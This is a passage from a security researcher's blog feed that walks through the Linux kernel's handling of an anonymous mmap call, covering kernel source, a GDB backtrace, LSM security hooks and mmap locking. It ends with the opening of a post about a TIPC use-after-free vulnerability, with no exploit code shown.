</span></span></code></pre></div><p><code>[mmap(2)](https://man7.org/linux/man-pages/man2/mmap.2.html)</code> is the system call which &ldquo;creates a new mapping in the virtual address space of the calling process&rdquo;, for usage information check out the man page.</p>
<p>In our case we&rsquo;re creating a mapping of <code>0x1000</code> bytes, AKA <code>PAGE_SIZE</code>. We want to be able to read and write to it, so have specified the <code>PROT_READ | PROT_WRITE</code> protection flags. As we touched on before, we&rsquo;re not mapping a file or anything, so we specify <code>MAP_ANONYMOUS</code> - we just want to map a page of unused physical memory.</p>
<p>We also specify <code>MAP_PRIVATE</code>, which in the context of an anonymous mapping means that this mapping won&rsquo;t be shared with other processes, for example if we fork a child process. More broadly speaking it means &ldquo;Updates to the mapping are not visible to other processes mapping the same file, and are not carried through to the underlying file.&rdquo; <a href="https://man7.org/linux/man-pages/man2/mmap.2.html">[1]</a>.</p>
<p>Finally, because it&rsquo;s an anonymous mapping the file descriptor and offset fields are ignored (some implementations require the <code>fd</code> to be -1, so that&rsquo;s why we set it) as we&rsquo;re not mapping a file in which we might want to map from a specific offset within.</p>
<h3 id="entering-the-kernel">Entering The Kernel</h3>
<p>Okay, so we understand the system call from a userspace perspective, how do we go about understanding how it&rsquo;s implemented? Well, without going into detail on how system calls work, we can generally find out a system calls &ldquo;entry point&rdquo; in the kernel by grepping the source for <code>SYSCALL_DEFINE.*&lt;syscall name&gt;</code>:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="nf">SYSCALL_DEFINE6</span><span class="p">(</span><span class="n">mmap</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">long</span><span class="p">,</span> <span class="n">addr</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">long</span><span class="p">,</span> <span class="n">len</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">		<span class="kt">unsigned</span> <span class="kt">long</span><span class="p">,</span> <span class="n">prot</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">long</span><span class="p">,</span> <span class="n">flags</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">		<span class="kt">unsigned</span> <span class="kt">long</span><span class="p">,</span> <span class="n">fd</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">long</span><span class="p">,</span> <span class="n">off</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="p">{</span>
</span></span><span class="line"><span class="cl">	<span class="k">if</span> <span class="p">(</span><span class="n">off</span> <span class="o">&amp;</span> <span class="o">~</span><span class="n">PAGE_MASK</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">		<span class="k">return</span> <span class="o">-</span><span class="n">EINVAL</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="k">return</span> <span class="nf">ksys_mmap_pgoff</span><span class="p">(</span><span class="n">addr</span><span class="p">,</span> <span class="n">len</span><span class="p">,</span> <span class="n">prot</span><span class="p">,</span> <span class="n">flags</span><span class="p">,</span> <span class="n">fd</span><span class="p">,</span> <span class="n">off</span> <span class="o">&gt;&gt;</span> <span class="n">PAGE_SHIFT</span><span class="p">);</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span></code></pre></div><p><a href="https://elixir.bootlin.com/linux/v6.11.5/source/arch/x86/kernel/sys_x86_64.c#L79">arch/x86/kernel/sys_x86_64.c</a> (v6.11.5)</p>
<p>Check out the macros over in <code>[include/linux/syscalls.h](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/syscalls.h)</code> if you&rsquo;re curious; this will also explain how to figure out the actual symbol for kernel debugging (spoiler: it&rsquo;s <code>__x64_sys_&lt;name&gt;</code> in our case).</p>
<p>That said, <code>[mmap(2)](https://man7.org/linux/man-pages/man2/mmap.2.html)</code> was a terrible example for this little auditing tidbit as there&rsquo;s actually a lot of results for <code>SYSCALL_DEFINE.*mmap</code>. This is due to architecture specific implementations and legacy versions. If you wanted to be extra sure you can compare the arguments and architecture, or even whip out a debugger and break further in (e.g. on <code>[do_mmap()](https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L1255)</code>) [2] and check the back trace:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">(gdb) bt
</span></span><span class="line"><span class="cl">#0  do_mmap (file=file@entry=0x0 &lt;fixed_percpu_data&gt;, addr=addr@entry=0, len=len@entry=8192, prot=prot@entry=3, flags=flags@entry=34, 
</span></span><span class="line"><span class="cl">    pgoff=pgoff@entry=0, populate=0xffffc900004f7d08, uf=0xffffc900004f7d28) at mm/mmap.c:1408
</span></span><span class="line"><span class="cl">#1  0xffffffff81890ae1 in vm_mmap_pgoff (file=file@entry=0x0 &lt;fixed_percpu_data&gt;, addr=addr@entry=0, len=len@entry=8192, prot=prot@entry=3, 
</span></span><span class="line"><span class="cl">    flag=flag@entry=34, pgoff=pgoff@entry=0) at mm/util.c:551
</span></span><span class="line"><span class="cl">#2  0xffffffff819139db in ksys_mmap_pgoff (addr=&lt;optimized out&gt;, len=8192, prot=prot@entry=3, flags=34, fd=&lt;optimized out&gt;, 
</span></span><span class="line"><span class="cl">    pgoff=&lt;optimized out&gt;) at mm/mmap.c:1624
</span></span><span class="line"><span class="cl">#3  0xffffffff810beff6 in __do_sys_mmap (addr=&lt;optimized out&gt;, len=&lt;optimized out&gt;, prot=3, flags=&lt;optimized out&gt;, fd=&lt;optimized out&gt;, 
</span></span><span class="line"><span class="cl">    off=&lt;optimized out&gt;) at arch/x86/kernel/sys_x86_64.c:93
</span></span><span class="line"><span class="cl">#4  __se_sys_mmap (addr=&lt;optimized out&gt;, len=&lt;optimized out&gt;, prot=3, flags=&lt;optimized out&gt;, fd=&lt;optimized out&gt;, off=&lt;optimized out&gt;)
</span></span><span class="line"><span class="cl">    at arch/x86/kernel/sys_x86_64.c:86
</span></span><span class="line"><span class="cl">#5  __x64_sys_mmap (regs=0xffffc900004f7f58) at arch/x86/kernel/sys_x86_64.c:86
</span></span><span class="line"><span class="cl">#6  0xffffffff81008c2e in x64_sys_call (regs=regs@entry=0xffffc900004f7f58, nr=&lt;optimized out&gt;)
</span></span><span class="line"><span class="cl">    at ./arch/x86/include/generated/asm/syscalls_64.h:10
</span></span><span class="line"><span class="cl">#7  0xffffffff83be17a6 in do_syscall_x64 (regs=0xffffc900004f7f58, nr=&lt;optimized out&gt;) at arch/x86/entry/common.c:50
</span></span><span class="line"><span class="cl">#8  do_syscall_64 (regs=0xffffc900004f7f58, nr=&lt;optimized out&gt;) at arch/x86/entry/common.c:80
</span></span><span class="line"><span class="cl">#9  0xffffffff83e00124 in entry_SYSCALL_64 () at arch/x86/entry/entry_64.S:119
</span></span></code></pre></div><p>Backtrace from a 5.15 kernel using GDB</p>
<h3 id="x64sysmmap"><code>__x64_sys_mmap()</code></h3>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="nf">SYSCALL_DEFINE6</span><span class="p">(</span><span class="n">mmap</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">long</span><span class="p">,</span> <span class="n">addr</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">long</span><span class="p">,</span> <span class="n">len</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">		<span class="kt">unsigned</span> <span class="kt">long</span><span class="p">,</span> <span class="n">prot</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">long</span><span class="p">,</span> <span class="n">flags</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">		<span class="kt">unsigned</span> <span class="kt">long</span><span class="p">,</span> <span class="n">fd</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">long</span><span class="p">,</span> <span class="n">off</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="p">{</span>
</span></span><span class="line"><span class="cl">	<span class="k">if</span> <span class="p">(</span><span class="n">off</span> <span class="o">&amp;</span> <span class="o">~</span><span class="n">PAGE_MASK</span><span class="p">)</span> <span class="c1">// [0]
</span></span></span><span class="line"><span class="cl">		<span class="k">return</span> <span class="o">-</span><span class="n">EINVAL</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="k">return</span> <span class="nf">ksys_mmap_pgoff</span><span class="p">(</span><span class="n">addr</span><span class="p">,</span> <span class="n">len</span><span class="p">,</span> <span class="n">prot</span><span class="p">,</span> <span class="n">flags</span><span class="p">,</span> <span class="n">fd</span><span class="p">,</span> <span class="n">off</span> <span class="o">&gt;&gt;</span> <span class="n">PAGE_SHIFT</span> <span class="cm">/* [1] */</span><span class="p">);</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span></code></pre></div><p><a href="https://elixir.bootlin.com/linux/v6.11.5/source/arch/x86/kernel/sys_x86_64.c#L79">arch/x86/kernel/sys_x86_64.c</a> (v6.11.5)</p>
<p>Now we have a starting point, let&rsquo;s start exploring! <code>[__x64_sys_mmap()](https://elixir.bootlin.com/linux/v6.11.5/source/arch/x86/kernel/sys_x86_64.c#L79)</code> starts off validating the <code>off</code> field, making sure it&rsquo;s page aligned (i.e. a multiple of <code>PAGE_SIZE</code>) [0] and then shifting it so that <code>[ksys_mmap_pgoff()](https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L1476)</code> gets the page offset (instead off the byte offset) [1].</p>
<h3 id="ksysmmappgoff"><code>ksys_mmap_pgoff()</code></h3>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C"><span class="line"><span class="cl"><span class="kt">unsigned</span> <span class="kt">long</span> <span class="nf">ksys_mmap_pgoff</span><span class="p">(</span><span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">addr</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">len</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">			      <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">prot</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">flags</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">			      <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">fd</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">pgoff</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="p">{</span>
</span></span><span class="line"><span class="cl">	<span class="k">struct</span> <span class="n">file</span> <span class="o">*</span><span class="n">file</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">retval</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="p">(</span><span class="n">flags</span> <span class="o">&amp;</span> <span class="n">MAP_ANONYMOUS</span><span class="p">))</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">		<span class="c1">// SNIP, we have this flag set!
</span></span></span><span class="line"><span class="cl">	<span class="p">}</span> <span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="n">flags</span> <span class="o">&amp;</span> <span class="n">MAP_HUGETLB</span><span class="p">)</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">		<span class="c1">// SNIP, we don&#39;t have this flag set!
</span></span></span><span class="line"><span class="cl">	<span class="p">}</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="n">retval</span> <span class="o">=</span> <span class="nf">vm_mmap_pgoff</span><span class="p">(</span><span class="n">file</span><span class="p">,</span> <span class="n">addr</span><span class="p">,</span> <span class="n">len</span><span class="p">,</span> <span class="n">prot</span><span class="p">,</span> <span class="n">flags</span><span class="p">,</span> <span class="n">pgoff</span><span class="p">);</span>
</span></span><span class="line"><span class="cl"><span class="nl">out_fput</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">	<span class="k">if</span> <span class="p">(</span><span class="n">file</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">		<span class="nf">fput</span><span class="p">(</span><span class="n">file</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">	<span class="k">return</span> <span class="n">retval</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span></code></pre></div><p><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L1476">mm/mmap.c</a> (v6.11.5)</p>
<p>Well this one&rsquo;s nice and simple for us anonymous mappers! As there&rsquo;s no <code>file</code> involved and we&rsquo;re not using huge pages<a href="https://docs.kernel.org/admin-guide/mm/hugetlbpage.html">[3]</a> we cruise on into <code>[vm_mmap_pgoff()](https://elixir.bootlin.com/linux/v6.11.5/source/mm/util.c#L575)</code>.</p>
<h3 id="vmmmappgoff"><code>vm_mmap_pgoff()</code></h3>
<p>Hopefully we&rsquo;re warmed up now, as we&rsquo;ve got a bit more going on here!</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C"><span class="line"><span class="cl"><span class="kt">unsigned</span> <span class="kt">long</span> <span class="nf">vm_mmap_pgoff</span><span class="p">(</span><span class="k">struct</span> <span class="n">file</span> <span class="o">*</span><span class="n">file</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">addr</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">	<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">len</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">prot</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">	<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">flag</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">pgoff</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="p">{</span>
</span></span><span class="line"><span class="cl">	<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">ret</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="k">struct</span> <span class="n">mm_struct</span> <span class="o">*</span><span class="n">mm</span> <span class="o">=</span> <span class="n">current</span><span class="o">-&gt;</span><span class="n">mm</span><span class="p">;</span>          <span class="c1">// [0]
</span></span></span><span class="line"><span class="cl">	<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">populate</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="nf">LIST_HEAD</span><span class="p">(</span><span class="n">uf</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="n">ret</span> <span class="o">=</span> <span class="nf">security_mmap_file</span><span class="p">(</span><span class="n">file</span><span class="p">,</span> <span class="n">prot</span><span class="p">,</span> <span class="n">flag</span><span class="p">);</span>  <span class="c1">// [1]
</span></span></span><span class="line"><span class="cl">	<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">ret</span><span class="p">)</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">		<span class="k">if</span> <span class="p">(</span><span class="nf">mmap_write_lock_killable</span><span class="p">(</span><span class="n">mm</span><span class="p">))</span>    <span class="c1">// [2]
</span></span></span><span class="line"><span class="cl">			<span class="k">return</span> <span class="o">-</span><span class="n">EINTR</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">		<span class="n">ret</span> <span class="o">=</span> <span class="nf">do_mmap</span><span class="p">(</span><span class="n">file</span><span class="p">,</span> <span class="n">addr</span><span class="p">,</span> <span class="n">len</span><span class="p">,</span> <span class="n">prot</span><span class="p">,</span> <span class="n">flag</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">pgoff</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">populate</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">			      <span class="o">&amp;</span><span class="n">uf</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">		<span class="nf">mmap_write_unlock</span><span class="p">(</span><span class="n">mm</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">		<span class="nf">userfaultfd_unmap_complete</span><span class="p">(</span><span class="n">mm</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">uf</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">		<span class="k">if</span> <span class="p">(</span><span class="n">populate</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">			<span class="nf">mm_populate</span><span class="p">(</span><span class="n">ret</span><span class="p">,</span> <span class="n">populate</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">	<span class="p">}</span>
</span></span><span class="line"><span class="cl">	<span class="k">return</span> <span class="n">ret</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span></code></pre></div><p><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/util.c#L575">mm/util.c</a> (v6.11.5)</p>
<h4 id="fetching-our-mmstruct">Fetching Our <code>mm_struct</code></h4>
<p>First we fetch a reference to an <code>[mm_struct](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm_types.h#L779)</code> [0], which as we covered earlier, is a key structure that provides a description of a process&rsquo; virtual address space.</p>
<p><img src="https://sam4k.com/content/images/2024/12/image.png" alt=""></p>
<p>stolen from some of my old slides</p>
<p>But whose <code>[mm_struct](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm_types.h#L779)</code> are we grabbing? The kernel maintains a thread (i.e. a kernel stack) for each userspace process. When a userspace process makes a system call, the kernel executes in the &ldquo;context&rdquo; of that process, using it&rsquo;s associated kernel stack.</p>
<p>Along with its own kernel stack, each process has a <code>[task_struct](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/sched.h#L758)</code>  which keeps important data about the process such as its <code>[mm_struct](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm_types.h#L779)</code>. When the kernel is executing in a processes&rsquo; context, it can fetch the <code>[task_struct](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/sched.h#L758)</code> of the associated userspace process via <code>[current](https://elixir.bootlin.com/linux/v6.11.5/source/arch/x86/include/asm/current.h#L52)</code>.</p>
<p><code>[current](https://elixir.bootlin.com/linux/v6.11.5/source/arch/x86/include/asm/current.h#L52)</code> is a definition for <code>[get_current()](https://elixir.bootlin.com/linux/v6.11.5/source/arch/x86/include/asm/current.h#L44)</code> which returns the <code>[task_struct](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/sched.h#L758)</code> of the &ldquo;current&rdquo; kernel thread, from there we can fetch our <code>[mm_struct](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm_types.h#L779)</code> from the task&rsquo;s <code>mm</code> member.</p>
<h4 id="a-bit-of-security">A Bit Of Security</h4>
<p>Next up we do some security checks [1], via <code>security_mmap_file()</code>. Generally, if we see a kernel function with the <code>security_</code> prefix it&rsquo;s a hook belonging to the kernel&rsquo;s modular security framework<a href="https://docs.kernel.org/admin-guide/LSM/index.html">[6]</a>.</p>
<p>Looking at the code we&rsquo;ll notice two definitions<a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/security.h#L1053">[4]</a><a href="https://elixir.bootlin.com/linux/v6.11.5/source/security/security.c#L2849">[5]</a>, depending on if <code>[CONFIG_SECURITY](https://cateee.net/lkddb/web-lkddb/SECURITY.html)</code> is enabled. We&rsquo;ll consider the default case, where it is enabled:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C"><span class="line"><span class="cl"><span class="cm">/**
</span></span></span><span class="line"><span class="cl"><span class="cm"> * security_mmap_file() - Check if mmap&#39;ing a file is allowed
</span></span></span><span class="line"><span class="cl"><span class="cm"> * @file: file
</span></span></span><span class="line"><span class="cl"><span class="cm"> * @prot: protection applied by the kernel
</span></span></span><span class="line"><span class="cl"><span class="cm"> * @flags: flags
</span></span></span><span class="line"><span class="cl"><span class="cm"> *
</span></span></span><span class="line"><span class="cl"><span class="cm"> * Check permissions for a mmap operation.  The @file may be NULL, e.g. if
</span></span></span><span class="line"><span class="cl"><span class="cm"> * mapping anonymous memory.
</span></span></span><span class="line"><span class="cl"><span class="cm"> *
</span></span></span><span class="line"><span class="cl"><span class="cm"> * Return: Returns 0 if permission is granted.
</span></span></span><span class="line"><span class="cl"><span class="cm"> */</span>
</span></span><span class="line"><span class="cl"><span class="kt">int</span> <span class="nf">security_mmap_file</span><span class="p">(</span><span class="k">struct</span> <span class="n">file</span> <span class="o">*</span><span class="n">file</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">prot</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">		       <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">flags</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="p">{</span>
</span></span><span class="line"><span class="cl">	<span class="k">return</span> <span class="nf">call_int_hook</span><span class="p">(</span><span class="n">mmap_file</span><span class="p">,</span> <span class="n">file</span><span class="p">,</span> <span class="n">prot</span><span class="p">,</span> <span class="nf">mmap_prot</span><span class="p">(</span><span class="n">file</span><span class="p">,</span> <span class="n">prot</span><span class="p">),</span>
</span></span><span class="line"><span class="cl">			     <span class="n">flags</span><span class="p">);</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span></code></pre></div><p><a href="https://elixir.bootlin.com/linux/v6.11.5/source/security/security.c#L2860">/security/security.c</a> (v6.11.5)</p>
<p>If we look for references to <code>mmap_file</code>, we can see these hooks are registered by the <code>[LSM_HOOK_INIT()](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/lsm_hooks.h#L114)</code> macro and that different security modules implement their own <code>mmap_file</code> hooks (e.g. capabilities, apparmor, selinux, smack).</p>
<p>Multiple security modules can be active on a system: the capabilities module is always active, along with any number of &ldquo;minor&rdquo; modules and up to one &ldquo;major&rdquo; module (e.g. apparmor, selinux). We can check which one&rsquo;s are active via <code>/sys/kernel/security/lsm</code>, the output on my VM is:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">$ cat /sys/kernel/security/lsm
</span></span><span class="line"><span class="cl">lockdown,capability,landlock,yama,apparmor
</span></span></code></pre></div><p>Of these, the capability and apparmor security modules both define hooks for <code>mmap_file</code>. In this case, both hooks will be run when <code>security_mmap_file()</code> is called.</p>
<p><img src="https://sam4k.com/content/images/2024/12/pat_down.gif" alt=""></p>
<p>I hope that was interesting, because in our example neither of these checks actually do anything. Capabilities&rsquo; <code>[cap_mmap_file()](https://elixir.bootlin.com/linux/v6.11.5/source/security/commoncap.c#L1436)</code> always returns a success and apparmor&rsquo;s <code>[apparmor_mmap_file()](https://elixir.bootlin.com/linux/v6.11.5/source/security/apparmor/lsm.c#L582)</code> only does checks if a <code>file</code> is specified.</p>
<h4 id="locking">Locking</h4>
<p>Before we delve another call deeper into the mm subsystem, let&rsquo;s quickly talk about locking. The call to <code>[do_mmap()](https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L1255)</code> is protected by the mmap write lock [2]:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C"><span class="line"><span class="cl"><span class="kt">unsigned</span> <span class="kt">long</span> <span class="nf">vm_mmap_pgoff</span><span class="p">(</span><span class="k">struct</span> <span class="n">file</span> <span class="o">*</span><span class="n">file</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">addr</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">	<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">len</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">prot</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">	<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">flag</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">pgoff</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="p">{</span>
</span></span><span class="line"><span class="cl"><span class="c1">// SNIP
</span></span></span><span class="line"><span class="cl">		<span class="k">if</span> <span class="p">(</span><span class="nf">mmap_write_lock_killable</span><span class="p">(</span><span class="n">mm</span><span class="p">))</span>
</span></span><span class="line"><span class="cl">			<span class="k">return</span> <span class="o">-</span><span class="n">EINTR</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">		<span class="n">ret</span> <span class="o">=</span> <span class="nf">do_mmap</span><span class="p">(</span><span class="n">file</span><span class="p">,</span> <span class="n">addr</span><span class="p">,</span> <span class="n">len</span><span class="p">,</span> <span class="n">prot</span><span class="p">,</span> <span class="n">flag</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">pgoff</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">populate</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">			      <span class="o">&amp;</span><span class="n">uf</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">		<span class="nf">mmap_write_unlock</span><span class="p">(</span><span class="n">mm</span><span class="p">);</span>
</span></span></code></pre></div><p><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/util.c#L575">mm/util.c</a> (v6.11.5)</p>
<p>Locking is extremely important within the kernel and is used to protect shared resources by serialising access or prevent concurrent writes. Insufficient locking can lead to all sorts of undefined behaviour and security issues.</p>
<p><code>[mmap_write_lock_killable()](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mmap_lock.h#L117)</code> provides a wrapper for the <code>mm-&gt;mmap_lock</code>, which is a R/W semaphore. In laymans term, multiple &ldquo;readers&rdquo; can take this lock (i.e. if the calling code is just planning to read the protected resource) or a single writer can [7].</p>
<p>So what does the mmap lock actually protect? That&rsquo;s a great question and I&rsquo;m not sure there&rsquo;s a definitive, detailed &ldquo;specification&rdquo; or anything for this (?). More generally though, it protects access to a processes address space. We&rsquo;ll understand more about what that entails as we delve deeper, but think add/changing/removing mappings as well as other fields within the <code>mm</code> structure too [8].</p>
<p>For the curious, the <code>_killable</code> suffix indicates that the process can be killed while waiting for the lock[9][10]. In which case the function returns an error, which is caught here.</p>
<hr>
<ol>
<li><a href="https://man7.org/linux/man-pages/man2/mmap.2.html">https://man7.org/linux/man-pages/man2/mmap.2.html</a></li>
<li>If you&rsquo;re testing this at home, be mindful that other places will call <code>do_mmap()</code>, particularly when running a program</li>
<li><a href="https://docs.kernel.org/admin-guide/mm/hugetlbpage.html">https://docs.kernel.org/admin-guide/mm/hugetlbpage.html</a></li>
<li><a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/security.h#L1053">https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/security.h#L1053</a></li>
<li><a href="https://elixir.bootlin.com/linux/v6.11.5/source/security/security.c#L2849">https://elixir.bootlin.com/linux/v6.11.5/source/security/security.c#L2849</a></li>
<li><a href="https://docs.kernel.org/admin-guide/LSM/index.html">https://docs.kernel.org/admin-guide/LSM/index.html</a></li>
<li>Checkout Linux Inside&rsquo;s deep dive into semaphores <a href="https://0xax.gitbooks.io/linux-insides/content/SyncPrim/linux-sync-3.html">here</a>.</li>
<li>LWN has a good article, <a href="https://lwn.net/Articles/893906/">&ldquo;The ongoing search for mmap_lock scalability&rdquo;</a> (2022), on the importance of the <code>mmap_lock</code> and attempts to scale it</li>
<li>The <code>_killable</code> variant for rw semaphores was actually added in 2016, you can checkout the <a href="https://lwn.net/Articles/677962/">initial patch series</a> for details</li>
<li><a href="https://medium.com/geekculture/the-linux-kernel-locking-api-and-shared-objects-1169c2ae88ff">&ldquo;The Linux Kernel Locking API and Shared Objects&rdquo;</a> (2021) by Pakt is a nice resource on locking if you want to dive into the topic a bit more</li>
</ol>
<h2 id="next-time">Next Time</h2>
<p><img src="https://sam4k.com/content/images/2024/12/tired_baby.gif" alt=""></p>
<p>Hopefully this isn&rsquo;t too much of a cliff hanger, but this post has been in my drafts for far too long now and I fear if I don&rsquo;t post it soon it&rsquo;ll never get finished 💀.</p>
<p>I went for a bit of a different approach with this topic, due to the scope of the mm subsystem. The aim was to use a simple case study to provide some structure and context to an otherwise complex topic. I also wanted to present an approach and workflow that could perhaps be transferable to researching other parts of the kernel, if that makes sense?</p>
<p>If folks are interested in a part 2, we&rsquo;ll continue to delve deeper into the mm subsystem, carrying on where we left off with <code>do_mmap()</code>. We&rsquo;ve barely scratched the surface so far! I&rsquo;d love to go into more detail on how mappings are represented and managed within the kernel and then move onto paging and who knows what other topics we stumble into.</p>
<p>As always feel free to @me (on <a href="https://twitter.com/sam4k1">X</a>, <a href="https://bsky.app/profile/sam4k.com">Bluesky</a> or less commonly used <a href="https://infosec.exchange/@sam4k">Mastodon</a>) if you have any questions, suggestions or corrections :)</p>
]]></content:encoded></item><item><title>ZDI-24-821: A Remote UAF in The Kernel's net/tipc</title><description>In this post I discuss a vulnerability which  allows a local, or remote attacker, to trigger a use-after-free in the TIPC networking stack on affected installations of the Linux kernel.</description><link>https://sam4k.com/zdi-24-821-a-remote-use-after-free-in-the-kernels-net-tipc/</link><guid isPermaLink="false">6670c154de619fc1154ef4d4</guid><category>linux</category><category>kernel</category><category>xdev</category><dc:creator>sam4k</dc:creator><pubDate>Wed, 03 Jul 2024 13:59:40 +0000</pubDate><media:content url="https://sam4k.com/content/images/2024/06/computer_wizard.gif" medium="image"/><content:encoded><![CDATA[<p>While preparing for my talk at TyphoonCon, <a href="https://github.com/sam4k/talk-slides/blob/main/so_you_wanna_find_bugs_in_the_linux_kernel.pdf">about how to find bugs in the Linux kernel</a>, I discovered a neat little vulnerability in the kernel&rsquo;s TIPC networking stack.</p>
<p>I found this while playing around with syzkaller as part of the research for my talk; I felt like it would only be fair to find some bugs to share if I&rsquo;m doing a talk about it :)</p>
<p>I picked the TIPC protocol for a few reasons: it had low coverage, net surface is fun, it&rsquo;s not enabled by default (not out here trying to find critical RCEs for a slide example) plus I have some previous experience working with the protocol.</p>
